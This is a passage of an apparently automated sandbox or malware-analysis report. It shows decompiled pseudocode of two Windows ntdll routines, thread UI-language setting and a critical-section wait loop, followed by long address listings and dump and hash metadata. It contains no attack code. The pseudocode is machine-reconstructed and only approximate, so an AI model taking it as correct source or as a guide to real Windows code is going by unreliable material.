					if( *_t134 != 0x31b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x31b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E030D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E030D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03168938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E030CB150();
													}
													_t116 = E03166D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E030D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x31b8638; // 0x0
																	_t122 = L030D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E030D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E030D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L030FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L030D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E030FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E030FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E030FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E030FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E030FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x31b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x31b7b84 = _t75;
						_t73 = E030DEB70(_t134, 0x31b7b60);
						if( *0x31b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E030DFF60( *0x31b7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                                                    0x030ffab0
                                                                                                                                                    0x030ffab2
                                                                                                                                                    0x030ffab3
                                                                                                                                                    0x030ffab4
                                                                                                                                                    0x030ffabc
                                                                                                                                                    0x030ffac0
                                                                                                                                                    0x030ffb14
                                                                                                                                                    0x030ffb17
                                                                                                                                                    0x030ffac2
                                                                                                                                                    0x030ffac8
                                                                                                                                                    0x030ffacd
                                                                                                                                                    0x030ffad3
                                                                                                                                                    0x030ffad3
                                                                                                                                                    0x030ffadd
                                                                                                                                                    0x030ffb18
                                                                                                                                                    0x030ffb1b
                                                                                                                                                    0x030ffb1d
                                                                                                                                                    0x030ffb1e
                                                                                                                                                    0x030ffb1f
                                                                                                                                                    0x030ffb20
                                                                                                                                                    0x030ffb21
                                                                                                                                                    0x030ffb22
                                                                                                                                                    0x030ffb23
                                                                                                                                                    0x030ffb24
                                                                                                                                                    0x030ffb25
                                                                                                                                                    0x030ffb26
                                                                                                                                                    0x030ffb27
                                                                                                                                                    0x030ffb28
                                                                                                                                                    0x030ffb29
                                                                                                                                                    0x030ffb2a
                                                                                                                                                    0x030ffb2b
                                                                                                                                                    0x030ffb2c
                                                                                                                                                    0x030ffb2d
                                                                                                                                                    0x030ffb2e
                                                                                                                                                    0x030ffb2f
                                                                                                                                                    0x030ffb3a
                                                                                                                                                    0x030ffb3b
                                                                                                                                                    0x030ffb3e
                                                                                                                                                    0x030ffb41
                                                                                                                                                    0x030ffb44
                                                                                                                                                    0x030ffb47
                                                                                                                                                    0x030ffb4a
                                                                                                                                                    0x030ffb4d
                                                                                                                                                    0x030ffb53
                                                                                                                                                    0x0313bdcb
                                                                                                                                                    0x0313bdcb
                                                                                                                                                    0x030ffb59
                                                                                                                                                    0x030ffb5b
                                                                                                                                                    0x030ffb5b
                                                                                                                                                    0x030ffb5e
                                                                                                                                                    0x0313bdd5
                                                                                                                                                    0x0313bdd8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bdda
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bdda
                                                                                                                                                    0x030ffb64
                                                                                                                                                    0x030ffb64
                                                                                                                                                    0x030ffb64
                                                                                                                                                    0x030ffb67
                                                                                                                                                    0x030ffb6e
                                                                                                                                                    0x030ffb70
                                                                                                                                                    0x030ffb72
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffb78
                                                                                                                                                    0x030ffb7a
                                                                                                                                                    0x030ffb7a
                                                                                                                                                    0x030ffb7d
                                                                                                                                                    0x030ffb80
                                                                                                                                                    0x0313bddf
                                                                                                                                                    0x0313bde1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bde3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bde3
                                                                                                                                                    0x030ffb86
                                                                                                                                                    0x030ffb86
                                                                                                                                                    0x030ffb86
                                                                                                                                                    0x030ffb8b
                                                                                                                                                    0x030ffb90
                                                                                                                                                    0x030ffb92
                                                                                                                                                    0x030ffb94
                                                                                                                                                    0x030ffb9a
                                                                                                                                                    0x030ffb9b
                                                                                                                                                    0x030ffba1
                                                                                                                                                    0x0313bde8
                                                                                                                                                    0x0313bdeb
                                                                                                                                                    0x0313bded
                                                                                                                                                    0x0313beb5
                                                                                                                                                    0x0313beb5
                                                                                                                                                    0x0313bebb
                                                                                                                                                    0x0313bebd
                                                                                                                                                    0x0313bec3
                                                                                                                                                    0x0313bed2
                                                                                                                                                    0x0313bedd
                                                                                                                                                    0x0313bedd
                                                                                                                                                    0x0313beed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bdf3
                                                                                                                                                    0x0313bdfe
                                                                                                                                                    0x0313be06
                                                                                                                                                    0x0313be0b
                                                                                                                                                    0x0313be0d
                                                                                                                                                    0x0313be0f
                                                                                                                                                    0x0313be14
                                                                                                                                                    0x0313be19
                                                                                                                                                    0x0313be20
                                                                                                                                                    0x0313be25
                                                                                                                                                    0x0313be27
                                                                                                                                                    0x0313be35
                                                                                                                                                    0x0313be39
                                                                                                                                                    0x0313be46
                                                                                                                                                    0x0313be4f
                                                                                                                                                    0x0313be54
                                                                                                                                                    0x0313be56
                                                                                                                                                    0x0313bef8
                                                                                                                                                    0x0313bef8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313be5c
                                                                                                                                                    0x0313be5c
                                                                                                                                                    0x0313be60
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313be66
                                                                                                                                                    0x0313be66
                                                                                                                                                    0x0313be7f
                                                                                                                                                    0x0313be84
                                                                                                                                                    0x0313be87
                                                                                                                                                    0x0313be89
                                                                                                                                                    0x0313be8b
                                                                                                                                                    0x0313be99
                                                                                                                                                    0x0313be9d
                                                                                                                                                    0x0313bea0
                                                                                                                                                    0x0313beac
                                                                                                                                                    0x0313beaf
                                                                                                                                                    0x0313beb1
                                                                                                                                                    0x0313beb3
                                                                                                                                                    0x0313beb3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bea2
                                                                                                                                                    0x0313bea2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bea2
                                                                                                                                                    0x0313be8d
                                                                                                                                                    0x0313be8d
                                                                                                                                                    0x0313be92
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313be92
                                                                                                                                                    0x0313be8b
                                                                                                                                                    0x0313be60
                                                                                                                                                    0x0313be3b
                                                                                                                                                    0x0313be3b
                                                                                                                                                    0x0313be3e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313be40
                                                                                                                                                    0x0313be40
                                                                                                                                                    0x0313be44
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313be44
                                                                                                                                                    0x0313be3e
                                                                                                                                                    0x0313be29
                                                                                                                                                    0x0313be29
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313be29
                                                                                                                                                    0x0313be27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffba7
                                                                                                                                                    0x030ffba7
                                                                                                                                                    0x030ffbab
                                                                                                                                                    0x0313bf02
                                                                                                                                                    0x030ffbb1
                                                                                                                                                    0x030ffbb1
                                                                                                                                                    0x030ffbb8
                                                                                                                                                    0x030ffbbd
                                                                                                                                                    0x030ffbbd
                                                                                                                                                    0x030ffbbf
                                                                                                                                                    0x030ffbbf
                                                                                                                                                    0x030ffbc5
                                                                                                                                                    0x030ffbcb
                                                                                                                                                    0x030ffbf8
                                                                                                                                                    0x030ffbf8
                                                                                                                                                    0x030ffbfa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc00
                                                                                                                                                    0x030ffc00
                                                                                                                                                    0x030ffc03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc09
                                                                                                                                                    0x030ffc09
                                                                                                                                                    0x030ffc0f
                                                                                                                                                    0x030ffc15
                                                                                                                                                    0x030ffc23
                                                                                                                                                    0x030ffc23
                                                                                                                                                    0x030ffc25
                                                                                                                                                    0x030ffc27
                                                                                                                                                    0x030ffc75
                                                                                                                                                    0x030ffc7c
                                                                                                                                                    0x030ffc84
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc29
                                                                                                                                                    0x030ffc29
                                                                                                                                                    0x030ffc2d
                                                                                                                                                    0x030ffc30
                                                                                                                                                    0x0313bf0f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc36
                                                                                                                                                    0x030ffc38
                                                                                                                                                    0x030ffc3b
                                                                                                                                                    0x030ffc41
                                                                                                                                                    0x0313bf17
                                                                                                                                                    0x0313bf19
                                                                                                                                                    0x0313bf48
                                                                                                                                                    0x0313bf4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bf1b
                                                                                                                                                    0x0313bf22
                                                                                                                                                    0x0313bf24
                                                                                                                                                    0x0313bf26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bf2c
                                                                                                                                                    0x0313bf37
                                                                                                                                                    0x0313bf39
                                                                                                                                                    0x0313bf3b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bf41
                                                                                                                                                    0x0313bf41
                                                                                                                                                    0x0313bf41
                                                                                                                                                    0x0313bf41
                                                                                                                                                    0x0313bf45
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313bf45
                                                                                                                                                    0x0313bf3b
                                                                                                                                                    0x0313bf26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc47
                                                                                                                                                    0x030ffc47
                                                                                                                                                    0x030ffc49
                                                                                                                                                    0x030ffcb2
                                                                                                                                                    0x030ffcb4
                                                                                                                                                    0x030ffcb6
                                                                                                                                                    0x030ffcdc
                                                                                                                                                    0x030ffcdc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffcb8
                                                                                                                                                    0x030ffcc3
                                                                                                                                                    0x030ffcc5
                                                                                                                                                    0x030ffcc7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffcc9
                                                                                                                                                    0x030ffcc9
                                                                                                                                                    0x030ffccd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffccd
                                                                                                                                                    0x030ffcc7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc4b
                                                                                                                                                    0x030ffc4b
                                                                                                                                                    0x030ffc4e
                                                                                                                                                    0x030ffc4e
                                                                                                                                                    0x030ffc51
                                                                                                                                                    0x030ffc51
                                                                                                                                                    0x030ffc54
                                                                                                                                                    0x030ffc5a
                                                                                                                                                    0x030ffc5c
                                                                                                                                                    0x030ffc5f
                                                                                                                                                    0x030ffc61
                                                                                                                                                    0x030ffc63
                                                                                                                                                    0x030ffc65
                                                                                                                                                    0x030ffc67
                                                                                                                                                    0x030ffc6e
                                                                                                                                                    0x030ffc72
                                                                                                                                                    0x030ffc72
                                                                                                                                                    0x030ffc72
                                                                                                                                                    0x030ffc72
                                                                                                                                                    0x030ffc67
                                                                                                                                                    0x030ffc61
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc5a
                                                                                                                                                    0x030ffc49
                                                                                                                                                    0x030ffc41
                                                                                                                                                    0x030ffc30
                                                                                                                                                    0x030ffc27
                                                                                                                                                    0x030ffc03
                                                                                                                                                    0x030ffbcd
                                                                                                                                                    0x030ffbd3
                                                                                                                                                    0x030ffbd9
                                                                                                                                                    0x030ffbdc
                                                                                                                                                    0x030ffbde
                                                                                                                                                    0x030ffc99
                                                                                                                                                    0x030ffc9b
                                                                                                                                                    0x030ffc9d
                                                                                                                                                    0x030ffcd5
                                                                                                                                                    0x030ffcd5
                                                                                                                                                    0x030ffc89
                                                                                                                                                    0x030ffc89
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffc9f
                                                                                                                                                    0x030ffc9f
                                                                                                                                                    0x030ffca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffbe4
                                                                                                                                                    0x030ffbe4
                                                                                                                                                    0x030ffbe4
                                                                                                                                                    0x030ffbe4
                                                                                                                                                    0x030ffbe9
                                                                                                                                                    0x030ffbf2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffbf2
                                                                                                                                                    0x030ffbde
                                                                                                                                                    0x030ffbcb
                                                                                                                                                    0x030ffbab
                                                                                                                                                    0x030ffc8b
                                                                                                                                                    0x030ffc8b
                                                                                                                                                    0x030ffc8c
                                                                                                                                                    0x030ffb80
                                                                                                                                                    0x030ffb72
                                                                                                                                                    0x030ffb5e
                                                                                                                                                    0x030ffc8d
                                                                                                                                                    0x030ffc91
                                                                                                                                                    0x030ffadf
                                                                                                                                                    0x030ffadf
                                                                                                                                                    0x030ffae1
                                                                                                                                                    0x030ffae4
                                                                                                                                                    0x030ffae7
                                                                                                                                                    0x030ffaec
                                                                                                                                                    0x030ffaf8
                                                                                                                                                    0x030ffb00
                                                                                                                                                    0x030ffb07
                                                                                                                                                    0x030ffb0f
                                                                                                                                                    0x030ffb0f
                                                                                                                                                    0x030ffb07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffaf8
                                                                                                                                                    0x030ffadd

                                                                                                                                                    Strings
                                                                                                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0313BE0F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                                                    • API String ID: 0-865735534
                                                                                                                                                    • Opcode ID: cc45442bd0ff0b37f57afa3760bc36568b1918702b0e382fefc82e2812c9edd7
                                                                                                                                                    • Instruction ID: 651a89ba1e3dcbbd1af972d6a61a1e4370a470bdbd23939b726e9088cda89c5b
                                                                                                                                                    • Opcode Fuzzy Hash: cc45442bd0ff0b37f57afa3760bc36568b1918702b0e382fefc82e2812c9edd7
                                                                                                                                                    • Instruction Fuzzy Hash: FBA10735B027168FDB25DF68C5507BEB3E9AF49710F088579DA06DBA90EB30D841CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                    			E030C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x31b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x31b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E031097C0();
				}
				if( *0x31b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x31b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E030F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E030E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0315FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E03109520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E030FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0311DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x31b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x31b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E03109980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E031095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E030E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E030E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E03147016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0315FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x31b5350;
							if(_t109 != 0x31b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0315FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E03155720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                                                    0x030c2d8a
                                                                                                                                                    0x030c2d8a
                                                                                                                                                    0x030c2d92
                                                                                                                                                    0x030c2d96
                                                                                                                                                    0x030c2d9e
                                                                                                                                                    0x030c2da0
                                                                                                                                                    0x030c2da3
                                                                                                                                                    0x030c2da5
                                                                                                                                                    0x030c2da8
                                                                                                                                                    0x030c2dab
                                                                                                                                                    0x030c2db2
                                                                                                                                                    0x0311f9aa
                                                                                                                                                    0x0311f9ab
                                                                                                                                                    0x0311f9ae
                                                                                                                                                    0x0311f9ae
                                                                                                                                                    0x030c2db8
                                                                                                                                                    0x030c2dc2
                                                                                                                                                    0x0311f9b9
                                                                                                                                                    0x0311f9be
                                                                                                                                                    0x0311f9bf
                                                                                                                                                    0x0311f9bf
                                                                                                                                                    0x030c2dcf
                                                                                                                                                    0x0311f9c9
                                                                                                                                                    0x030c2dd5
                                                                                                                                                    0x030c2dd5
                                                                                                                                                    0x030c2dd5
                                                                                                                                                    0x030c2dde
                                                                                                                                                    0x030c2de1
                                                                                                                                                    0x030c2e70
                                                                                                                                                    0x030c2e72
                                                                                                                                                    0x030c2e72
                                                                                                                                                    0x030c2de7
                                                                                                                                                    0x030c2deb
                                                                                                                                                    0x030c2e7c
                                                                                                                                                    0x030c2e83
                                                                                                                                                    0x030c2e85
                                                                                                                                                    0x030c2e8b
                                                                                                                                                    0x030c2e8d
                                                                                                                                                    0x030c2e92
                                                                                                                                                    0x030c2e92
                                                                                                                                                    0x030c2e85
                                                                                                                                                    0x030c2df1
                                                                                                                                                    0x030c2df7
                                                                                                                                                    0x030c2df9
                                                                                                                                                    0x030c2df9
                                                                                                                                                    0x030c2dfc
                                                                                                                                                    0x030c2dff
                                                                                                                                                    0x030c2e02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c2e05
                                                                                                                                                    0x030c2e0c
                                                                                                                                                    0x0311f9d9
                                                                                                                                                    0x030c2e12
                                                                                                                                                    0x030c2e12
                                                                                                                                                    0x030c2e12
                                                                                                                                                    0x030c2e1a
                                                                                                                                                    0x0311f9e3
                                                                                                                                                    0x0311f9e9
                                                                                                                                                    0x0311f9f0
                                                                                                                                                    0x0311f9f6
                                                                                                                                                    0x0311f9f8
                                                                                                                                                    0x0311f9f8
                                                                                                                                                    0x0311f9f0
                                                                                                                                                    0x030c2e23
                                                                                                                                                    0x0311fa02
                                                                                                                                                    0x0311fa03
                                                                                                                                                    0x0311fa05
                                                                                                                                                    0x0311fa06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c2e29
                                                                                                                                                    0x030c2e29
                                                                                                                                                    0x030c2e2e
                                                                                                                                                    0x030c2e34
                                                                                                                                                    0x030c2e3e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c2e44
                                                                                                                                                    0x030c2e47
                                                                                                                                                    0x030c2e4d
